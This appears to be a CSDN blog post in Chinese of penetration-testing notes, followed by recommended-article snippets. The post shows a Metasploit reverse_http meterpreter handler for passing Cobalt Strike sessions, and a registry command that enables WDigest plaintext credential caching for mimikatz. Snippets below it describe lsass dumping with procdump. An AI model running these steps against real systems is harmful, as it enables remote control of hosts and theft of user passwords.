第二次渗透

最新推荐文章于 2024-08-03 07:21:58 发布

漂洋过海砍尼（hxh）

最新推荐文章于 2024-08-03 07:21:58 发布

阅读量198

点赞数 1

文章标签：安全

本文链接：https://blog.csdn.net/m0_64340736/article/details/139271798

版权

一：cs与msf权限传递

1.创建Foreign监听器；

2.MSF监听模块设置对应地址端口；

use exploit/multi/hander
set payload windows/meterpreter/reverse_http
set lport 4444
exploit

3.cs执行新建会话选择创建的监听器；

验证：

二.mimikatz抓取win2012明文密码：

修改注册表的来保存明文：

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

修改注册表之后，注销用户(强制锁屏进行注销)，重新登录才能抓取到明文

抓取的明文：

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

漂洋过海砍尼（hxh）

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
第二次渗透

修改注册表之后，注销用户(强制锁屏进行注销)，重新登录才能抓取到明文。
复制链接

扫一扫

记录第二次web渗透测试篇

m0_47421272的博客

01-11

3162

** 首先是一些渗透利用的工具: 1.dirb 2.nmap 3.nikto 4.中国蚁剑+weevely ** 开始 url:http://www.xxx.com/admin/media 首先尝试若口令登录 admin:admin 登不进去用dirb扫描看看有没有敏感目录先看看robots.txt有没有东西什么都没有继续看另一个状态500的 ok啊这里看了一下没有爆sql帐号密码绝对路径倒是有了 ...

一次完整的安全渗透测试

12-28

网络渗透测试的第一步通常是进行漏洞扫描，目的是发现目标系统中可能存在的安全漏洞。在这个案例中，使用了JSky Web漏洞扫描器进行扫描。通过对目标网站（http://www.*****.com）的扫描，我们了解到该网站是由ASP...

参与评论您还未登录，请先登录后发表或查看评论

mimikatz在Win10及2012系统以后的明文抓取方式

netsec_steven的博客

07-10

1万+

1.procdump+mimikatz获取win10/win2012 R2用户明文密码测试环境：win10企业版和win2012 R2 版本工具下载：链接：https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码：fc38 原理：获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码利用前提：拿到了admin权限的cmd，管理员用密码登录机器，并运行了lsass.exe进程，把密码保存在内存文件lsass进程中。抓.

cs与msf权限传递以及mimikatz抓取win2012明文密码

huizhaohaha的博客

05-25

795

我查找过资料得出，Cobalt Strike 的前身是 Armitage，而 Armitage 又可以理解为 Metasploit Framework 的图形界面版，因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的，所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上，同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework。

cs给msf传shell+mimikatz读取明文密码

vt_yjx的博客

05-22

614

set payload windows/meterpreter/reverse_http（注：这里是http,与cs上线的监听器一致）密码是null，是因为官方改的。然后输入密码后给到lsass.exe这个进程，这个进程会存储一份明文再内存中。windows输入密码的进程是winlogon.exe。考虑sam文件了，可以dump出来本地破解出明文。上传一个锁屏脚本，管理员重新输入密码后可以抓明文。mimikatz就抓内存中的明文。set lport 自己的端口号。set lhost 本机ip。

cs与msf权限传递，以及mimikatz抓取win2012明文密码

weixin_62304542的博客

05-27

795

cs与msf权限传递，以及mimikatz抓取win2012明文密码

一次渗透测试实战

热门推荐

m0_46467017的博客

04-23

2万+

一次渗透测试实战前言信息收集漏洞验证漏洞攻击Grafana任意文件读取漏洞（CVE-2021-43798）一、漏洞描述二、漏洞影响范围Payload：ActiveMQ 任意文件上传漏洞（CVE-2016-3088）一、漏洞描述二、漏洞影响范围三、漏洞利用：写入webshell权限提升CVE-2021-4034 Linux polkit 提权漏洞一、漏洞描述二、影响版本三、漏洞利用总结前言学习了一两个月的安全，为了对自己的一个学习水平做一个总结，所以我特地找来一个网站来进行一次渗透实战。信息收集这次的

七、Kali Linux 2 渗透攻击

m0_55313512的博客

02-20

5000

Kali Linux 网络渗透测试

第二次工业革命.ppt

12-07

《第二次工业革命：电力与电讯的崛起》 ...这些创新不仅极大地提升了生产力，也为后世的科技发展奠定了坚实的基础，可以说，第二次工业革命是人类历史上的一次重大飞跃，它的影响至今仍深远地渗透在我们的日常生活中。

第二次鸦片战争000002.pptx

02-23

- **侵占范围**: 在第二次鸦片战争期间，俄国通过不平等条约割占了中国东北和西北地区的大片领土，总面积达到150多万平方千米。 ### 三、战争的影响 - **中国主权的进一步丧失**: 第二次鸦片战争导致中国丧失更多...

第二次工业革命新.ppt

11-07

【第二次工业革命】是19世纪70年代开始的一场科技革命，与第一次工业革命相比，它具有更深远的影响和特点。这场革命的核心是电力的广泛应用、内燃机的发明和使用、化学工业的建立以及立体交通和新通信技术的发展。 ...

NKU数学建模第二次实战演练.zip

06-17

近半个多世纪以来，随着计算机技术的迅速发展，数学的应用不仅在工程技术、自然科学等领域发挥着越来越重要的作用，而且以空前的广度和深度向经济、管理、金融、生物、医学、环境、地质、人口、交通等新的领域渗透，...

科普文：Linux系统安全加固指南

为无为，事无事，味无味。

07-25

1746

本指南仅关注安全性和隐私性，而不关注性能，可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量，不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包，因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面；它尝试做的事情远远超出了必要，并且超出了初始化系统应做的事情。使用musl作为默认的C库。

读零信任网络：在不可信网络中构建安全系统07设备信任

lyingSeven的博客

08-03

608

设备安全

数理方法习题前六章.pdf

08-03

数理方法习题前六章

某大型制造企业IT蓝图规划及实施路线.pptx